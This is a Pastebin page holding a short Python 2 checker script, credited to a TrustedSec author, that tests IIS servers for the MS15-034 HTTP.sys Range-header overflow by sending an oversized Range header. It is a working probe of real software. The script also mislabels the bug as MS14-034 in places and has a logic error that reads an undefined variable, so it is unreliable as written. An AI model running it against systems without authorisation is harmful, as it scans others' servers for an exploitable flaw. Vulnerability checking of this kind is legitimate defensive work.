Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Quick MS14-034 checker that supports HTTP/HTTPS
- # Written by David Kennedy @ TrustedSec
- # Blog: https://www.trustedsec.com/april-2015/ms15-034-range-header-integer-overflow/
- import sys
- import urllib2
- try:
- url = "%s" % sys.argv[1]
- except:
- print ''
- print "MS14-034 Checker written by Dave Kennedy @ TrustedSec"
- print "Original PoC used from here http://pastebin.com/ypURDPc4"
- print "Supports HTTP/HTTPS"
- print "Usage: python ms15-034.py <http(s)://url>"
- print ''
- exit(0)
- request = urllib2.Request(url)
- request.add_header('Range', 'bytes=0-18446744073709551615')
- opener = urllib2.build_opener()
- counter = 0
- try:
- feeddata = opener.open(request).read()
- except Exception, e:
- if "Requested Range Not Satisfiable" in str(e):
- print "[*] Server appears to be vulnerable - got requested 'Request Range Not Satisfiable'."
- counter = 1
- else:
- print "[*] Does not appear to be vulnerable or got a different response. Printing response: " + str(e)
- counter = 1
- if "The request has an invalid header name" in feeddata or counter == 0:
- print "[*] Does not appear to be vulnerable. Congrats! Or if you are a hacker, sorry dude :("
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement